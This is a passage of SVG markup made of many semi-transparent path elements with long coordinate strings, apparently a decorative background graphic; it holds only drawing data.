d=\"M416.07,66a3.28,3.28,0,0,1-3.5.35,25.63,25.63,0,0,1-4.73.71,2.23,2.23,0,0,0,1.79.7c2.87.1,5.75-.14,8.63-.16,1.26,0,2.79-.18,3.68.45.62.43.79,2.32.39,3.2-1.43,3.17.41,3.24,2.63,3.16.88-3.25,3.72-2.82,6.1-3.27-.16-.29-.25-.78-.48-.85-3.11-1-6-2.18-8.09-4.26C420.35,66,418.21,66,416.07,66Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1895.24,114.11a8,8,0,0,1,1.56-2.31,11.38,11.38,0,0,1-1.64.24C1895.17,112.73,1895.19,113.42,1895.24,114.11Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1905.75,106c0-.09.08-.18.11-.27l-1.19-.76c-5.26.56-7.07-.66-9.71-4.92-.77-1.25-3.3-1.84-5.07-1.94-2.62-.15-5,.42-7.87-.48-2.42-.78-5.66,1-9.08,1.79a7.37,7.37,0,0,1-.4-1.8c-.18-3-2.6-4.3-5.11-2.8a6.53,6.53,0,0,1-2.39,1.06c-3.41.41-6.84.81-10.26.92a27.36,27.36,0,0,1-5.26-.81l-3.89-.68a11.48,11.48,0,0,0,2.06,2.26c2.17,1.39,4.47,2.57,6.7,3.87.85.5,1.65,1.58,2.45,1.55,3.57-.12,7.14-.54,11.48-.92a8.36,8.36,0,0,1,1.19,1.93,8.2,8.2,0,0,0,7.45,5c.56,0,1.08.73,1.68.85,2,.4,4,.68,6,1-.24-1.53-.5-3.06-.72-4.6-.12-.86-.48-1.9-.15-2.56a2.76,2.76,0,0,1,2.16-1.12,51.21,51.21,0,0,1,5.5.55l.92-1.3a38.5,38.5,0,0,1,2.41,5.92,21,21,0,0,1,.41,4.29,11.38,11.38,0,0,0,1.64-.24,4.84,4.84,0,0,1,2.63-1.43v-5.44A6.52,6.52,0,0,0,1905.75,106Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1906.11,105.9l-.25-.16c0,.09-.07.18-.11.27Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1906.31,106l-.2-.13-.36.11c-.87,2.2-1.66,4.4-.56,6.6,0-3.84,1.92,0,3.84-1.92a6.49,6.49,0,0,0-1.87,4.88c.08,0,.16,0,.25.06,1.19.38,2.88-.85,4.34-1.34-.64-1.15-1.21-2.34-1.94-3.42C1908.7,109.22,1907.48,107.64,1906.31,106Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M1905.19,112.61c-1.1-2.2-.31-4.4.56-6.6a6.52,6.52,0,0,1-6.32-1.08v5.44a7.28,7.28,0,0,1,3.42.33c.57.17.94,1,1.41,1.51-.47.39-.92.82-1.41,1.18-1.16.85-2.33,1.68-3.5,2.51a10.94,10.94,0,0,1,7.81-.33,6.49,6.49,0,0,1,1.87-4.88C1907.11,112.61,1905.19,108.77,1905.19,112.61Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1841.25,93.09l-2.65,1.15c-.44,1.45-.88,2.9-1.39,4.61l7.11-3.44-1.62-1.88Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1805.12,94.7l.12,1.32c1.9.79,3.55.73,4.61-1.34l-2.87-1Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1610.26,74.9c-3-2.13-6.32-3.74-9.72-5.7-1.09,2.47-1.5,4.62-4.13,3-.25-.15-1.88,1.28-2.25,2.23-.27.7.45,1.8.76,2.82l-3.83.53a15.57,15.57,0,0,1-.45-3.63c.42-3.24-2.32-3.61-4.14-4.18-2.08-.66-4.46-.36-6.71-.47-4.33.72-1.18,5.15-3.41,8.37l-3-5.61c-5.69-1.77-11.75,2.1-17-2a.46.46,0,0,0-.33-.07c-3.42.13-6.84.22-10.25.46a7.76,7.76,0,0,0-2.34,1,76.7,76.7,0,0,0,11,.88c3.11,0,6.07,3.85,9.82,1.13,4.48,2.21,9.91,2.83,12.88,7.72,2.49-.31,4.22-1.21,4.2-4.18,0-.68,1.05-2,1.44-1.94a3.9,3.9,0,0,1,2.48,1.54c.49.79,0,2.29.57,2.91a21.57,21.57,0,0,0,3.84,2.76c.55-2,1.63-2.65,3.75-2,1,.3,2.26-.22,3.4-.36l.61-.79c.34-1,.42-2.56,1.06-2.83,2.55-1.06,5.31-2.4,7.91-2.24,1.38.09,2.58,3,3.87,4.69l.85.6,4.24-4.74-.08,0-.07-.06C1613.61,75.42,1612.25,76.32,1610.26,74.9Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1672.05,77.23c-7.14,2.24-12.93-.67-18.27-5.13-2,1.79-4.39,3.18-5.58.06s-3.12-3.37-5.78-3.25a10.49,10.49,0,0,1-3.93-.59c-4.74-1.76-11.18.87-13.09,5.71a36,36,0,0,1-3.67-1.4c-3.2-1.64-4.49-1.26-6.49,2.07l.07.06.08,0c3.23.21,6.47.29,9.67.68,1,.13,2,1.08,3,1.65,2.17-.16,4-.47,3.94-3.46,0-1,1.46-2.37,2.55-2.75.7-.25,2,.95,2.9,1.6.54.37.87,1.24,1.42,1.38,5,1.3,10.1,2.46,15.14,3.74,2.52.64,5,1.52,7.51,2.18,1.6.42,3.25.65,4.88,1l1.9-1,4-1.18,1.11-.79a2.61,2.61,0,0,0-.08-.55Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1418.08,75.15l-2,1.17A2.8,2.8,0,0,1,1411.7,74c-.08-2.55-1.19-2.8-3.27-2-1.73.62-3.53,1-5.69,1.6-.74,2-1.7,4.51-2.34,6.2-2.42,0-5.09-.22-5.19.16a12.83,12.83,0,0,1-1.06,3c2.55.09,4.55-2.42,7.06-1.16.26-.38.5-.77.75-1.18.9-1.51,2.64-3.34,4.15-3.49a16.85,16.85,0,0,1,7.51,1.39c.92.37,1.21,2.37,2.16,4.46,1-3.19.65-6.75,4.61-6.79-.18-.64-.36-1.28-.59-2.08Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1521.68,67.32a3.24,3.24,0,0,0-2.29.3c-3.15,2.53-6.32,1.19-9.62.47-1.15-.26-2.56.65-3.85,1,3.86.44,7.7,1.08,11.57,1.25,4.37.19,8.78-.25,13.15,0,3.83.2,7.63.94,11.44,1.44a11.89,11.89,0,0,0-2.91-1.47C1533.35,69.22,1527.52,68.26,1521.68,67.32Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1432.47,69.35c-2.84-.79-6.83,2.34-7.59,5.52l9.91-2.57C1434,71.27,1433.44,69.62,1432.47,69.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1494.72,69.78c1.49-.63,3.52.08,5.31.07a7.58,7.58,0,0,0,1.93-.52L1491.9,68C1492.27,69.4,1492.31,70.81,1494.72,69.78Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1823.13,91.5c2.2,1.79,4.19,4,6.66,5.22,1.69.84,4.32,1.3,5.58-1.44-3-1.35-5.89-2.82-8.94-4C1825.5,90.94,1824.24,91.41,1823.13,91.5Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1803.27,96.36l-3.54-.31C1800.73,98.26,1801.87,98.73,1803.27,96.36Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1899.21,117.79l.45.23-.06-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1899.32,115.94l-1,1.4.9.45.39-.15C1899.5,117.07,1899.41,116.5,1899.32,115.94Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M829.91,17.17c3.32,1.48,6.16,4,8.5,5.66.69,2.1.83,4,1.82,5,.54.56,2.52-.25,3.85-.44L844,26.26l-3.13-1.57,1.68-4.79.52.89,5.46-.74c2.14,1.1,3.93,2,5.74,2.95,1.08.55,2.9.83,3.16,1.63,1.61,4.89,4.53,2.43,7.35,1.72a17.15,17.15,0,0,1,4.64,0c.77,0,1.59.45,2.3.29,3.48-.78,6.07.56,8.42,3s3.3,2.39,5.56-.86h0l0,0h0c-1.9-.49-4-.6-5.64-1.55-2.79-1.6-5.49-3-8.83-2.53a1.37,1.37,0,0,1-.67,0c-2.43-.85-4.8-2.09-7.29-2.46-2.32-.35-4.77.22-7.41.4.25-1.64.44-2.83.62-4l-5.58-2.33-1.28-.27c-1.13.42-2.29,1.24-3.4,1.17-2.26-.13-4.56-1.22-6.33,1.25a3.36,3.36,0,0,1-2-1,4.6,4.6,0,0,0-4.76-2.91c-2.65,0-5.3-.43-8-.67L823,12.54l-4,0-1.36,1.23a11.41,11.41,0,0,0,2.6,1.37C823.45,15.84,827,15.86,829.91,17.17Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M628.92,64.11a4,4,0,0,0,2.57-1.64c1.61-3.27,4-2.52,6.27-1.29,3.89,2.08,8,1.82,10.88-.64l6.54.81c.05.43.13,1.18.18,1.61,6.45-2.75,14.07-1.15,19.28-6.26,4,3.24,3.87,3.16,7.22-.54a4.35,4.35,0,0,1,3.43-.95c3.6.59,6.43-.35,8.67-3.28s3-2.8,5.56,0l2.38-2.67a13.59,13.59,0,0,0-3.13-1.19c-3.33-.42-3.45-2.07-2.27-4.71.34-.74-.37-1.91-.45-2.9s0-2.27,0-3.41c1.2,0,2.64-.41,3.55.12a30,30,0,0,1,4.4,3.71c-.4-.91-1.31-2-1.11-2.71.86-3.1-.42-3.09-2.93-2.79-1,.12-2.25-1.43-3.39-2.22a14.65,14.65,0,0,1,2.5-1.72c1.06-.45,2.31-.45,3.37-.89.76-.32,2-1.2,1.91-1.55a22.79,22.79,0,0,0-1.6-3.82L699,26c.5-1,.78-2.26,1.56-2.94a29.86,29.86,0,0,1,4.4-2.71c.47,1,1,1.58,1,2.15-.08,2.06.56,4.18,2.67,3.75,1.19-.24,2-2.77,2.79-4.36.27-.53-.11-1.35,0-2,.18-1.56.46-3.11.7-4.66l.94-.57c2.37,4.62,5.35,3.84,8.33,1.56,1.77-1.36,3.91-2.68,4.86-4.55,1.87-3.63,2.13-4,6.66-2.81l-1.71,4.17c2.19,0,3.65.07,5.11,0,2-.12,4.31,1,5.73-1.59.21-.39,2-.5,2.47-.08,2.2,1.88,4.7.78,7,1.14a74.34,74.34,0,0,1,7.66,2,7.56,7.56,0,0,0,1.82.32c1.35,0,2.9-.49,4,0,2.42,1,4.58,2.68,6.93,3.9a14.93,14.93,0,0,0,3.31.88c0-1.07-.14-2.14-.07-3.19s.2-3.15.54-3.2a34.09,34.09,0,0,1,7.62-.28c.21,0,.26,2.7.33,4.15a13.6,13.6,0,0,0,0,2.71c.31,1.18.71,3,1.46,3.27,1.8.53,4,2.17,6-.42-.76-.89-1.8-1.63-2.08-2.59a4.11,4.11,0,0,1,.35-3.22,75.25,75.25,0,0,1,5.12-5.76l-4.23-.85h-1.75a23.59,23.59,0,0,1-4.87.23c-4.93-.78-9.8-1.94-14.74-2.64A7.7,7.7,0,0,0,764.73,9a12.36,12.36,0,0,1-11.05.46c-.51-.21-1.33-.55-1.59-.33-3.85,3.18-5.5-2.22-8.51-2.15-.06,0-.12-.41-.18-.62l-1.29.11c-2.07,3.28-4.58,3-7.61-.72l-4,0-8.09,4c-1.32-.92-3.16-1.42-4.43,1.62-.64,1.52-2,1.41-2.69-.2A31.91,31.91,0,0,1,714.1,7l-4.7.72c-.26.87-.58,1.72-.79,2.59-.65,2.77-1.66,4.61-4.66,2a1.92,1.92,0,0,0-1.27-.45C694,12.55,686,9,677.53,7.84c-7.12-1-10.72,2.1-15.18,6.16l-.93-2.22c-2.34.47-4.46.84-6.55,1.35-1.41.35-2.76.91-4.14,1.36s-3,.95-4.43,1.4c-2.86.87-2.94,3.58-2.8,5.56.17,2.28,1.58,4.46,2.5,6.81,3.22-2.47,1.91-7.61,6.6-9-1.43,5.66-2.78,11-4.11,16.31h8.27l1.52-2L660.16,35a62.13,62.13,0,0,0,6.15-1,6.4,6.4,0,0,0,2.42-1.67c2.82-2.66,4.43-2.49,6.69.82.5.74.89,1.55,1.33,2.33l1.27,0c3.29-1.6,4.49.31,5,2.79,1.88.76,3.88,1,5,2.18a5.3,5.3,0,0,1,1.31,4.43,5.08,5.08,0,0,1-3.59,2.81,45.42,45.42,0,0,1-10.16,0,7.44,7.44,0,0,1-4.27-2.35c-2.85-3.18-3.63-3.18-5.73,1.12-.32-1.48-.56-2.59-1-4.78l-5.06,7.23c-8.42-4.81-7.21-4.6-12.22.4-1.86-2.11-4.43-4.06-6.74-2-1.57,1.36-6.06.63-5.15,4.57h7a17.25,17.25,0,0,1,.21,3.11,29.4,29.4,0,0,1-.88,3.44,13.22,13.22,0,0,1-3.1-1.4c-1.86-1.49-3.39-1.28-5.13.2a2.66,2.66,0,0,1-2.33.28c-.43-.18-.58-1.34-.58-2.07,0-2,.15-3.93.24-5.9l-1.5-.44-4.38,5.54c.44,2.07.87,4.15,1.3,6.21-5.57,1.5-5.57,1.5-5.65,3.89,1.33-.18,2.63-.43,3.94-.51A35.87,35.87,0,0,0,628.92,64.11Zm31-43c-.86-.22-1.49-1.36-2.23-2.1.66-.59,1.27-1.59,2-1.67s1.46.81,2.2,1.27c.2.44.4.87.59,1.31C661.61,20.33,660.63,21.25,659.92,21.08Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M985,55.33c1.46-2.15,3-1.15,4.76-.44,5.9,2.42,12,3.57,18.34,2.29.65-.12,2,.4,2.1.83.72,3.42,3.4,3.9,6.1,4.17,6.63.67,13.45,2.49,19-3.39.76-.81,2.85-.92,4.13-.58,4.64,1.21,9.25,2.57,13.75,4.2s7.75.24,9.1-4.07a10.62,10.62,0,0,1,.93-1.83c1.5,2.4,2.88,4.59,4.67,7.46,2-2.3,3.74-4.51,5.69-6.53.87-.9,2.23-2,3.22-1.92s2.08,1.55,2.91,2.57,1,2.73,1.83,3c3.21,1,6.57,1.61,9.87,2.35.5-1.36,1-2.72,1.44-3.87l-9.51-3.68c.26-2.06,1.18-4.23.5-5-1.34-1.55-3.45-2.5-5.7-.66-.7.57-2.06.26-3.1.48-1.46.31-3.25.32-4.28,1.19-2.55,2.15-5.08,1.41-8.44.93l6-4.6-.54-1c-2.62.6-5.77-1.68-7.81,2.27a75.78,75.78,0,0,1-4.52,7l-5-4.48c-3.75.55-7.67.15-11.14,2.29-.61.38-1.7,0-2.58,0-2.43-.07-5.53-1.09-7.16,0-2.81,1.92-5,3.09-8.39,1.6-1.68-.74-3.94-.25-5.58-1-5.87-2.85-11.71-3.89-17.88-1.09-.41.18-1.15-.31-1.71-.55s-1.53-1.05-1.94-.85c-4.21,2.08-8.5-2.77-12.67.18-.17.13-.9-.23-1.14-.54-1.95-2.59-3.37-1.33-4.72.6,2.66,1.1,5.3,2.25,8,3.27A1.59,1.59,0,0,0,985,55.33Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M409.63,67.73c2.4.08,4.82-.07,7.23-.13a2.58,2.58,0,0,1,1.94-.47,8.4,8.4,0,0,0,1.4.43,4.27,4.27,0,0,1,1.22.21c3.68.44,7.7-.46,10.67,2.75.18.2.62.21,1,.25l17.24,2.13v3.48l11.92-2c5.85-1,10,3.53,15.15,4.94,3.69,1,6.73,1.89,10-.58,1.47-1.11,2.59-3.55,5-1.2.17.17,1.73-.58,2.1-1.21a40.76,40.76,0,0,0,2.08-4.91l-3.05-1.14-2,1.35-.95.4-.4,1c-.4.62-1,1.83-1.18,1.77-3.22-1.15-7.18.12-9.79-3l-3.3-.12c-.48,2.5-2.2,2.1-3.94,1.71A45.91,45.91,0,0,0,467,72.33c-2.9-.35-6.4.42-8.61-1-4.34-2.7-8.77-1.22-13.12-1.78-3.89-.5-8-.54-11.59-1.87-5.92-2.19-11.91-1.64-17.91-1.77-2.64,0-5.27,1.05-7.93,1.07A2.23,2.23,0,0,0,409.63,67.73Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M528.33,60,532,62.45l1-.27,2.73-2.76,2,2.1a1.43,1.43,0,0,0,.16.57c2,2.19,1.8,4.12-.66,6.21a1.48,1.48,0,0,0-.19.57c0,.71.06,1.42.08,2.13.91,0,2.15.29,2.65-.18,2.74-2.53,4.64-1.92,6.27,1.18a2,2,0,0,0,1.64.63c.48-.5,1.07-1.51.86-2-1-2.06.52-5.25-2.83-6.36-.17,0,.1-3.21.62-3.36,5.07-1.48,8.48-7.13,14.61-5.91.16,0,.45-.66.68-1l-.74-1.36.07-.12-3.44-.5-8.15,0-4.79.53c-.91,2.39-1.8,4.34-5.06,2.42A10.91,10.91,0,0,0,534,54c-3.57.08-6.12,2.92-5.72,6Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M797.9,16.16c4.54,1.39,4.73,1.71,3.73,5.93,5.87,2.82,12.19.84,19.09,1.15L818.5,19c-2,1.22-3.54,2.9-4.49,2.61-2-.6-3.28-2.38-2.1-4.74l.71.53,3.64-3.57c-4-2.19-8.21-1.74-12.42-.6-1.08.29-2.19.49-3.28.74V9.76l-4,.62v.69C797,12.75,794.67,15.18,797.9,16.16Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M898.68,32.93A23.5,23.5,0,0,1,905,36.22c2.23,1.52,4.15,3.79,7.08,1.3a1.55,1.55,0,0,1,1.24-.28c3.11,1,6.21,2.07,9.67,3.24a6.75,6.75,0,0,1,8.71,1.39c1.94,2.4,6.73,2.33,9.15-.14a9.88,9.88,0,0,0-2.6-1.37c-8.16-1.43-15.42-6.32-23.95-6.26-2,.87-3.89,1.8-5.89,2.54-.32.12-1.27-.57-1.38-1a2.27,2.27,0,0,1,.64-1.7,19.13,19.13,0,0,1,2.13-1.87l-.15-.16-2.89-.56a48.5,48.5,0,0,0-5.84-2.1,17.66,17.66,0,0,0-4.35.07C896.65,30.87,896.43,32.29,898.68,32.93Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M600.59,62l2.14-1.93.07.87c2.81.33,5.62.75,8.44.87.42,0,1.19-1.39,1.28-2.2a10,10,0,0,0-.53-2.94c-.68-.56-1.32-1.17-2-1.67-3.19-2.25-6.4-4.47-9.6-6.71l-1.28,0c0,.3,0,.59,0,.89l3.51,2.9C598.91,57,598.36,59.78,600.59,62Z\" transform=\"translate(0 0)\"\n opacity=\"0.1\"></path>\n <path d=\"M793.24,26.65a4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76-1.26-3.64-.74-7.86-5.65-8.65-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0A12.07,12.07,0,0,0,793.24,26.65Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M945.42,45.14a7.4,7.4,0,0,1,2.3.36c4.19,1,8.38,2,12.55,3,1.46.37,3.3.56,4.23,1.54,2.66,2.8,5.85,2.55,9.14,2.33-3.18-1.55-6.24-3.5-9.58-4.56-4.33-1.36-8.92-1.9-13.34-3-2.63-.66-5.17-1.72-7.75-2.59C942.68,44.16,943.16,45.34,945.42,45.14Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M705.23,41.47c.24,1,.49,2,.74,3,1.37.31,2.73.68,4.11.92a2.43,2.43,0,0,0,1.77-.14,2.19,2.19,0,0,0,.6-1.77C712.08,41.86,706.69,40.44,705.23,41.47Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M566.9,62.85l4.09-.37c0-.65,0-1.31.08-2l-3.93-.7Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M566.48,55.5c.88-.51,1.75-1,2.62-1.55,0-.33,0-.66,0-1l-2.67-.39h-.72l-1.25.23-.81,1.24C564,55.73,564.79,56.48,566.48,55.5Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.72,28.77c2.09-.33,4.87.74,5.44-2.68l-2.07-.77-3.41,3.4,0,0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M402,64.38a12,12,0,0,0-3.8-.12l3.72,1.19C401.88,65.09,401.91,64.73,402,64.38Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M533.65,70.75l.94,2.17,1.85-1.85-1.39-.76Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1092.16,55.67c.14-.05.18-.35.26-.54l-.57-.24c-.08.19-.27.42-.21.56A.55.55,0,0,0,1092.16,55.67Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M18.44,71.94A8.27,8.27,0,0,0,18,71c-3.4-.93-11.69-5.11-18-8v6.54C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M19.56,70.79a2.81,2.81,0,0,1,1.29-2.4c3.26-1.37,7-2,9.89-3.8,3.33-2.12,6-4.61,8.93.21.19.31,1.5-.08,2.3-.14a11.13,11.13,0,0,0-.78-2.49A13.83,13.83,0,0,0,39.1,60c2-.16,3.6.18,4.53-.44,3.66-2.47,7.56-2.39,11.66-1.88.84.11,1.77-.56,2.67-.87A66.19,66.19,0,0,0,49.7,56c-2.08,0-4.12,1.07-6.22,1.3C35,58.2,26.47,59,18,59.82L13.3,64.15l.6,1.25C15.24,67.29,17,69,18,71,19.1,71.33,19.69,71.3,19.56,70.79Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M66.23,56.25c2.09.74,3.41.14,4.79-1.32a8.11,8.11,0,0,1,2.36-1.45c1.93,2.9,4,.68,6,0,.73,4.47,3.79,5.76,8.55,3.67l-2.66-3.47c2.36-.27,4.3,0,5.56-.73,3.88-2.43,7.67-1.82,11.69-.68.89.25,2.06-.52,3.11-.82L94,49.77q-8.62,1.41-17.24,2.8a2,2,0,0,1-1-.2,5.37,5.37,0,0,0-6.17,1.43,3.11,3.11,0,0,1-2.58.66,7.68,7.68,0,0,0-7.71,2.11c1,0,2,0,3-.06C63.62,56.43,65.09,55.85,66.23,56.25Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23l-2.42-.78c0,.48,0,1-.05,1.46a22.28,22.28,0,0,0,9,3c3.72.58,8.26.5,10.54,5,.64,1.26,2.67,1.7,3.61-.49l0,0c-2.22.08-4.06,0-2.63-3.16.4-.88.23-2.77-.39-3.2a2.09,2.09,0,0,0-.52-.25c-.41,0-.82-.12-1.22-.21-.64,0-1.32,0-1.94,0l-1.4,0-.37.27c-2.69,2.28-9.66,2-11.95-.66-.2-.22-.17-.64-.24-1a7.52,7.52,0,0,0,3.54.79,2.26,2.26,0,0,1-.21-2c.19-.78-1.11-1.93-1.73-2.91a2.57,2.57,0,0,0-.14-.61c-2.85-.2-3.59,1.14-3.81,2.86A3.89,3.89,0,0,1,404.29,66.23Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M398.39,72.46c1.45-.38,3-.49,4.64-.75l-1.86-3.45c-3,3.64-5.33,3.67-8.89.42a22.56,22.56,0,0,0-4.12-2.4C389,69.59,395.25,73.29,398.39,72.46Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1899.43,110.37a4.84,4.84,0,0,0-2.63,1.43,7.83,7.83,0,0,0,2.63-1.11Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1788.06,100.5c1.9-.27,3.93.29,5.9.52,3.39.4,6.78.86,10.17,1.23.38,0,.79-.49,1.21-.52a11.9,11.9,0,0,1,3.42,0,24,24,0,0,1,3.82,1.48c.32-.46.74-.79.8-1.17.32-2.1,1.85-2.36,3.2-1.6.59.33.8,2.25.44,3.13-.76,1.86-2.44,3.59-.39,5.47,2.55,2.34,10.5,1.49,13.12-1a5,5,0,0,1,3.69-1.39c6,1,6,1.16,8.38-4.58.12-.27.43-.45,1.08-1.11,1.41,2.23,2.65,4.31,4,6.3,1.77,2.59,2.83,2.52,4.39-.13.7-1.19,1.53-2.29,2.31-3.43l1.12.12,1.85,8.84c1.67-.23,3.16-.81,4.47-.54,2.45.51,4.64,1.26,6.68-1.11.52-.61,2.25-.65,3.22-.32,7.35,2.44,15.29,3.58,21.22,9.29a6.59,6.59,0,0,0,1.53.83c2.11-1,3.77-2.24,5.51-3l-.9-.45,1-1.4,0,0c1.17-.83,2.34-1.66,3.5-2.51.49-.36.94-.79,1.41-1.18-.47-.52-.84-1.34-1.41-1.51a7.28,7.28,0,0,0-3.42-.33v.32a7.83,7.83,0,0,1-2.63,1.11,8,8,0,0,0-1.56,2.31c0-.69-.07-1.38-.08-2.07-5,.32-10.51-2.38-14.93.57,4.42-3,10-.25,14.93-.57a21,21,0,0,0-.41-4.29,38.5,38.5,0,0,0-2.41-5.92l-.92,1.3a51.21,51.21,0,0,0-5.5-.55,2.76,2.76,0,0,0-2.16,1.12c-.33.66,0,1.7.15,2.56.22,1.54.48,3.07.72,4.6-2-.32-4-.6-6-1-.6-.12-1.12-.83-1.68-.85a8.2,8.2,0,0,1-7.45-5,8.36,8.36,0,0,0-1.19-1.93c-4.34.38-7.91.8-11.48.92-.8,0-1.6-1-2.45-1.55-2.23-1.3-4.53-2.48-6.7-3.87a11.48,11.48,0,0,1-2.06-2.26l-1.31.09-7.11,3.44c.51-1.71,1-3.16,1.39-4.61l-3.23,1c-1.26,2.74-3.89,2.28-5.58,1.44-2.47-1.24-4.46-3.43-6.66-5.22l-2.63.37c-.42.3-.85.59-1.28.88L1815,92l-1.3.24-3.86,2.42c-1.06,2.07-2.71,2.13-4.61,1.34l-2,.34c-1.4,2.37-2.54,1.9-3.54-.31l-4.15-5.71-.76-.53-1.31.27-1.31.91c-2.15,1.16-4.26,2.4-6.47,3.43-1.68.78-3.49,1.3-5.23,1.93C1782,99.51,1784.34,101,1788.06,100.5Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path 